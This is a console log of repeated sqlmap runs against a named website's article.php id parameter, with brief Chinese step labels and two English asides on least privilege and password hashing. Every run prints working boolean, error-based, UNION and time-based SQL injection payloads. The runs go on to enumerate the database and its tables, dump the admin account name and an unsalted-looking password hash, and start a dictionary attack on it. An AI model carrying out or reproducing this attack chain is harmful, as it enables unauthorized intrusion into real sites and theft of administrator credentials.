D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-user /* 注解:获取当前用户名称 (the MySQL account the web application connects as; it should be a least-privilege account, not root)
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-db /*当前数据库
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
ssion': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容 (the password column is varchar(32) and the stored value is 32 hex characters, consistent with an unsalted MD5 digest; a salted, slow password hash limits the dictionary step that follows)
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack o
n retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap> |